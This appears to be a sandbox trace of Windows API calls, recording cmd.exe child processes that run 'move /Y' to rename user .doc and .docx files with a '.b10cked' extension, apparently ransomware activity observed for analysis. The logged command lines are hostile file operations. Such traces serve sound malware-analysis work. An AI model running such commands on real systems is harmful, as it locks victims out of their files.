GetEnvironmentStringsW () returned 0x3a0180* [0136.348] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0136.349] GetEnvironmentStringsW () returned 0x3a0180* [0136.349] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0136.349] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e914 | out: phkResult=0x26e914*=0x40) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0xa8, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, 
lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegCloseKey (hKey=0x40) returned 0x0 [0136.349] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e914 | out: phkResult=0x26e914*=0x40) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, 
lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.350] RegCloseKey (hKey=0x40) returned 0x0 [0136.350] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.350] srand (_Seed=0x5b88636a) [0136.350] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"" [0136.350] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"" [0136.350] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.350] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.350] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.350] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.350] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.350] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.350] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.350] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.350] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.351] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.351] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.351] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.351] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.351] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.351] GetEnvironmentStringsW () returned 0x3a22d0* [0136.351] FreeEnvironmentStringsW (penv=0x3a22d0) returned 1 [0136.351] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.351] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.351] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.351] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.351] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.351] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.351] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.351] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.351] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.351] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f6e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.351] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f6e0, lpFilePart=0x26f6dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f6dc*="Desktop") returned 0x18 [0136.351] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.352] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c) returned 0x3a0010 [0136.352] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0136.352] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c) returned 0x3a0010 [0136.352] FindClose (in: 
hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0136.352] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c) returned 0x3a0010 [0136.352] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0136.352] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.352] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.352] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.352] GetEnvironmentStringsW () returned 0x3a2af0* [0136.353] FreeEnvironmentStringsW (penv=0x3a2af0) returned 1 [0136.353] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.353] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f820, cchData=128 | out: lpLCData="0") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f820, cchData=128 | out: lpLCData="0") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f820, cchData=128 | out: lpLCData="1") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.377] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.378] GetConsoleTitleW (in: lpConsoleTitle=0x3908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.396] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.396] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.396] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.396] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.397] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.397] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.397] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.397] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.397] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.397] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.397] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.399] GetConsoleTitleW (in: lpConsoleTitle=0x26f518, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.438] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.438] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.438] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.438] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.438] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.438] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.438] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.438] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.438] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.438] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.438] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.438] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.439] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.439] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.439] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.439] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.439] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.439] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.439] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.439] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.439] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.439] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.439] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.439] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.439] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.439] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.439] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.439] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.439] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0136.439] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.439] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.439] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.439] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.439] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.439] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.440] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f2d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f2cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f2cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.442] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2=".") returned 67 [0136.442] _wcsicmp 
(_String1="QXDEHM~1.DOC", _String2="..") returned 67 [0136.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehm~1.doc")) returned 0x20 [0136.442] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.442] SetErrorMode (uMode=0x0) returned 0x0 [0136.442] SetErrorMode (uMode=0x1) returned 0x0 [0136.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", nBufferLength=0x104, lpBuffer=0x26ec5c, lpFilePart=0x26ec44 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", lpFilePart=0x26ec44*="QXDEHM~1.DOC") returned 0x26 [0136.442] SetErrorMode (uMode=0x0) returned 0x1 [0136.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2=".") returned 67 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2="..") returned 67 [0136.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehm~1.doc")) returned 0x20 [0136.443] SetErrorMode (uMode=0x0) returned 0x0 [0136.443] SetErrorMode (uMode=0x1) returned 0x0 [0136.443] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", nBufferLength=0x104, lpBuffer=0x26f0d8, lpFilePart=0x26ee70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", lpFilePart=0x26ee70*="QXDEHM~1.DOC") returned 0x26 [0136.443] SetErrorMode (uMode=0x0) returned 0x1 [0136.443] SetErrorMode (uMode=0x0) returned 0x0 [0136.443] SetErrorMode (uMode=0x1) returned 0x0 [0136.443] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", nBufferLength=0x104, lpBuffer=0x26f2e0, lpFilePart=0x26ee70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", lpFilePart=0x26ee70*="qXDEHmzN 
LrwSQhutJ.docx.b10cked") returned 0x39 [0136.443] SetErrorMode (uMode=0x0) returned 0x1 [0136.443] SetLastError (dwErrCode=0x0) [0136.443] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx.b10cked")) returned 0xffffffff [0136.443] GetLastError () returned 0x2 [0136.443] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x26e7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e7ec) returned 0x390e70 [0136.443] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x26e7ec | out: lpFindFileData=0x26e7ec) returned 0 [0136.444] GetLastError () returned 0x12 [0136.444] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0136.444] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x3a1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1be0) returned 0x390e70 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", nBufferLength=0x104, lpBuffer=0x26ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", lpFilePart=0x0) returned 0x39 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx", nBufferLength=0x104, lpBuffer=0x26ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx", lpFilePart=0x0) returned 0x31 [0136.445] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx")) returned 0x20 [0136.445] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx"), 
lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx.b10cked"), dwFlags=0x3) returned 1 [0136.445] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0136.445] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea38 | out: _Buffer=" 1") returned 9 [0136.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.445] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.462] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e9c4 | out: lpMode=0x26e9c4) returned 1 [0136.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e9f8 | out: lpConsoleScreenBufferInfo=0x26e9f8) returned 1 [0136.464] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.465] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea38 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.465] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea1c*=0x1a) returned 1 [0136.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.483] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.483] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.484] SetConsoleInputExeNameW () 
returned 0x1 [0136.484] GetConsoleOutputCP () returned 0x1b5 [0136.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.488] exit (_Code=0) Process: id = "141" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13739 start_va = 0x10000 end_va = 0x2ffff 